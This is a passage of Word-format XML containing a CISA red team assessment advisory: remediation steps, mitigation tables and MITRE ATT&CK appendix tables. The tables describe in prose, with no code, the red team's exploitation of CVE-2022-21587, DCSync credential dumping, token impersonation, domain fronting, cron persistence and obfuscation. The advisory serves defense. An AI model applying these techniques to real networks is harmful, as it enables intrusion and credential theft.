          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>IDM: The organization is looking into how to improve their IDM implementation and apply additional security alerts and preventions for possible misuse of credentials. They plan to implement additional identity- based monitoring capabilities in front of tier zero assets.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Egress: The organization implemented new processes to detect and prevent servers from anomalously egressing outside of the network to the internet. Host-based solutions: The organization used additional features of their antivirus software, such as reputation scores, to look for all executable file type outliers of to identify anomalous instances.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Hosts: The organization decommissioned clusters of servers and completely rebuilt them from scratch after identifying numerous irreparable issues and misconfigurations.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Solaris credentials: The organization changed passwords, removed SSH keys, restricted permissions, and removed unnecessary accounts. MITIGATIONS Network Defenders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CISA recommends organizations implement the recommendations in Table 1 to mitigate the findings listed in the Lessons Learned and Key Findings section of this advisory. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. See CISA's Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections. Table 1: Recommendations to Mitigate Identified Issues Finding Recommendation Inadequate firewall between perimeter and internal devices Deploy internal and external network firewalls to inspect, log, and/or block unknown or unauthorized traffic.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Perform deep packet inspection to detect mismatched application traffic or encrypted data flows.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Restrict outbound internet egress to hosts whenever possible.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Establish a baseline of normal user activity, including unique IPs or domains.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Insufficient Network Segmentation Apply the principle of least privilege to limit the exposure of systems and services in the demilitarized zone (DMZ).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Segment the DMZ based on the sensitivity of systems and services as well as the internal network [CPG 2.F].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Segment networks to protect assets and workstations from direct exposure to the internet by considering the criticality of the asset to business functions, sensitivity of the data traversing the asset, and requirements for internet access to the asset.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Implement and regularly test firewalls, access control lists, and intrusion prevention systems.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Take advantage of opportunities to create natural network segmentation. Securely configured VPNs used for remote laptops, for instance, create an easy place to filter and monitor incoming traffic.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Trust relationships between domains were overly permissive Restrict network connectivity (ingress and egress) to only necessary services between trusted domains [CPG 2.E].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Regularly monitor privileged access via Foreign Security Principals (FSPs). Defensive activity was not sufficiently isolated Perform network defense investigations out-of-band [CPG 3.A].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Conduct regular security audits and penetration testing by internal and external parties.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Develop and implement a comprehensive Incident Response Plan (IRP) and conduct regular drills and simulations [CPG 2.S].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>IDM solutions were not fully understood and utilized Enroll all accounts in IDM solutions and test against common credential manipulation techniques.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Integrate the IDM solution with other systems and applications, allowing for the streamlining of workflows.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Insufficient role-based host segmentation Establish Role-Based Access Controls (RBAC) to systematically assign permissions based on job functions [CPG 2.E].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Implement a comprehensive security model incorporating micro-segmentation at the host level.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Failure to monitor EDR alerts daily Develop and document Standard Operating Procedures (SOPs) for handling EDR alerts [CPG 5.A].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Establish and maintain incident response playbooks.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Conduct regular audits and reviews of the EDR alert handling process. Host artifacts were overly trusted Operationalize and deploy File Integrity Monitoring (FIM) solutions. Regularly review and adjust access permissions, adhering to the principle of least privilege [CPG 2.E].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Establish proper forensic processes to ensure integrity.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Bureaucracy and decentralization of network defenders hampered communication and consistency Introduce cross-training initiatives to cultivate a collaborative culture. Encourage the establishment of cross-functional projects.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Utilize collaboration platforms that seamlessly integrate various tools and systems.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Insufficient internal incident response report Promote a culture of ongoing improvement while also fostering a proactive approach among employees to promptly report suspicious activities.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Treat suspected incidents of compromise as a confirmed breach, and account for a threat actor's ability to move laterally when defining the scope of incident response efforts.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Focus on known/common IOCs Employ centralized logging and tool-agnostic detection methods.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Leverage threat intelligence feeds by integrating them into a SIEM tool. Implement regular updates for IOCs and TTPs, with the capability for customization to address the specific threat landscape [CPG 3.A].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Detection rules were visible from compromised systems Integrate runtime detection mechanisms while removing world-readable configuration files from installer deployments where applicable.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Insufficient restriction of admin tools Enhance security posture by implementing application allowlisting to ensure only trusted and approved applications are permitted [CPG 2.Q].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Apply the principle of least privilege by granting users only the minimum level of access necessary to perform job functions.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Insufficient tracking of software Conduct a comprehensive inventory of assets and establish a baseline for behavior [CPG 1.A].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Utilize a Software Asset Management (SAM) solution that offers comprehensive tracking, reporting, and compliance management capabilities. Deploy automated discovery and monitoring tools to continuously scan and identify new and existing software.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CISA recommends organizations implement the recommendations in Table 2 to mitigate other identified issues that can be uncovered through traditional penetration tests or red team assessments. Table 2: Recommendations to Mitigate Identified Issues Issue Recommendation Accounts were overprivileged and the organization's network contained unnecessary service accounts Apply the principle of least privilege when assigning permissions to user accounts. Audit existing group memberships, strip unnecessary privileges, and prune unnecessary nested groups/users.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Monitor for account lockout, especially on administrative accounts, and switch to a manual account unlock policy.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Increase monitoring for higher-risk accounts, such as service accounts, that are highly privileged and have a predictable pattern of behavior (e.g., scans that reliably run at a certain hour of the day).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Privileged users should have dedicated role-based user accounts and associated jump hosts to log into critical resources.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Insufficient EDR configuration Ensure all hosts have a form of EDR installed.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Deploy an EDR capable of catching commonly known obfuscation or execution techniques.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Insecure and insufficient credentials Ensure sensitive credentials and documents are not stored in an accessible place.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Mandate strong and complex passwords [CPG 2.B]. For more information, see CISA's Secure Our World: Require Strong Passwords.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Note: The above mitigations apply to critical infrastructure organizations with on-premises or hybrid environments. CISA encourage all organizations to prioritize purchasing products from manufacturers who demonstrate secure by design principles, such as evidenced by follow-on publications from companies who have signed the Secure by Design Pledge. Software Manufacturers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CISA recognizes that insecure software is the root cause of many flaws; the responsibility should not rest on the end user. CISA urges software manufacturers to implement the following: Eliminate default passwords and determine what password practices should be required (such as minimum password length and disallowing known breached passwords). Configure software to use more secure authentication schemes by default.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Provide logging at no additional charge. Cloud services and on-premises products should commit to generating and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>storing security related logs at no additional cost.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Work with security information and event management (SIEM) and security orchestration, automation, and response (SOAR) providers-in conjunction with customers-to understand how response teams use logs to investigate incidents. The goal is to develop logs that yield a comprehensive story of the event.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Remove unnecessary software dependencies. Unnecessary software increases the attack surface available to adversaries and may introduce additional vulnerabilities. Mitigating these additional vulnerabilities requires significant investment, consuming resources like time, technical personnel, and adding to the level of security effort.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These mitigations align with tactics provided in the joint guide Shifting the Balance of Cybersecurity Risk: Principles and Approaches for Secure by Design Software. CISA urges software manufacturers to take ownership of improving the security outcomes of their customers by applying these and other secure by design tactics. By using secure by design tactics, software manufacturers can make their product lines secure "out of the box" without requiring customers to spend additional resources making configuration changes, purchasing security software and logs, monitoring, and making routine updates.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more information on secure by design, see CISA's Secure by Design webpage. For more information on common misconfigurations and guidance on reducing their prevalence, see joint advisory NSA and CISA Red and Blue Teams Share Top Ten Cybersecurity Misconfigurations. VALIDATE SECURITY CONTROLS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addition to applying mitigations, CISA recommends exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&amp;CK for Enterprise framework in this advisory. CISA recommends testing your existing security controls inventory to assess how they perform against the ATT&amp;CK techniques described in this advisory.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 get started: Select an ATT&amp;CK technique described in this advisory (see Tables 3-11). Align your security technologies against the technique.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Test your technologies against the technique.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Analyze your detection and prevention technologies' performance.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Repeat the process for all security technologies to obtain a set of comprehensive performance data.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Tune your security program, including people, processes, and technologies, based on the data generated by this process.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CISA recommends continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&amp;CK techniques identified in this advisory. RESOURCES Layering Network Security Through Segmentation Recommended Practice: Improving Industrial Control System Cybersecurity with Defense-in-Depth Strategies Phishing Guidance: Stopping the Attack Cycle at Phase One BOFs Detecting DCSync App Domain Hijacking Overview DISCLAIMER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information in this report is being provided "as is" for informational purposes only. CISA does not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA. VERSION HISTORY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July 11, 2024: Initial version. APPENDIX: MITRE ATT&amp;CK TACTICS AND TECHNIQUES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See Tables 3-11 for all referenced threat actor tactics and techniques in this advisory.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3: Reconnaissance Technique Title ID Use Search Victim-Owned Websites T1594 CISA's red team used open source tools and services to probe the organization's internet-facing presence and gather information, including names, roles, and contact information. Gather Victim Network Information: DNS T1590.002 The red team gathered information about the organization's DNS records, which revealed several details about the organization's internal network.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Gather Victim Identity Information: Employee Names T1589.003 CISA's red team collected the assessed organizations' employee names to use their email addresses for specific targeting based on roles and responsibilities. Gather Victim Org Information: Identity Roles T1591.004 CISA's red team selected specific individuals from the assessed organization and targeted them with phishing payloads.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4: Command and Control Technique Title ID Use Application Layer Protocol: Web Protocols T1071.001 The red team exploited CVE-2022-21587 and ran a RAT that provided consistent C2 via open Transmission Control Protocol (TCP) ports.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Non-Standard Port T1571 The red team used SSH over ports 80 and/or 443 when establishing outbound C2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Proxy: Domain Fronting T1090.004 CISA's red team leveraged domain fronting to redirect and obfuscate their traffic.</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5: Credential Access Technique Title ID Use Brute Force: Password Cracking T1110.002 The red team cracked an account's password by using a common wordlist.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>OS Credential Dumping: DCSync T1003.006 CISA's red team pulled credentials for the domain via DCSync to gain full access to the domain.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Unsecured Credentials: Bash History T1552.003 The red team obtained a password by searching a user's bash command history, which provided further unprivileged access throughout the network.</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Table 6: Discovery Technique Title ID Use Domain Trust Discovery T1482 CISA's red team inspected the assessed organization's domain trust relationships through LDAP and identified potential connections in external organizations to which to move laterally. File and Directory Discovery T1083 The red team data mined numerous internal servers </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>and discovered one misconfigured share that contained plaintext usernames and passwords for several privileged service accounts.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7: Privilege Escalation Technique Title ID Use Hijack Execution Flow: Path Interception by PATH Environment Variable T1574.007 The red team hijacked the execution flow of a program that used a relative path instead of an absolute path, which enabled the capture of the account's password.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Access Token Manipulation: Token Impersonation/Theft T1134.001 CISA's red team impersonated the tokens of current users to exploit valid sessions and bypass the organization's IDM.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Access Token Manipulation: Make and Impersonate Token T1134.003 CISA's red team created new tokens and logon sessions for accounts not registered with the IDM to escalate privileges.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8: Lateral Movement Technique Title ID Use Remote Services: SSH T1021.004 CISA's red team used SSH with a valid account to move through the enclave.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Proxy T1090 The red team used a SOCKS proxy to avoid direct connections to their infrastructure and obscure the source of the malicious traffic. Use Alternate Authentication Material: Pass the Hash T1550.002 The red team's operations were hindered by the organization's IDM when it blocked the team's attempts to bypass system access controls using different hash types for authentication.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Use Alternate Authentication Material: Pass the Ticket T1550.003 CISA's red team's operations were hindered by the organization's IDM when it blocked the team's attempts to bypass system access controls using Kerberos tickets for authentication.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9: Collection Technique Title ID Use Data from Local System T1005 CISA's red team searched each host for files containing sensitive or interesting information such as password hashes, account information, network configurations, etc.</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10: Persistence Technique Title ID Use Scheduled Task/Job: Cron T1053.003 The red team used the cron utility to perform task scheduling and execute malicious code within Unix systems at specified times.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Scheduled Task/Job: At T1053.002 CISA's red team used the at utility to perform task scheduling and execute malicious code within Unix systems at a specified time and date.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Hijack Execution Flow: AppDomainManager T1574.014 The red team executed malicious payloads by hijacking how the .NETAppDomainManager loads assemblies.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Valid Accounts: Domain Accounts T1078.002 CISA's red team regularly used compromised valid domain accounts managed by Active Directory, giving access to resources of the domain.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11: Defensive Evasion Technique Title ID Use Masquerading: Masquerade Task or Service T1036.004 The red team enumerated local files and running processes to gather information for their payloads and persistence mechanisms to appear as legitimate activity.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Obfuscated Files or Information T1027 CISA's red team encrypted, encoded, and obfuscated their executables and C2 channels to evade defenses across the network.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification T1222.002 The red team modified file permissions with touch and chmod/chown commands to obfuscate their activity and blend in with other files in the environment.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
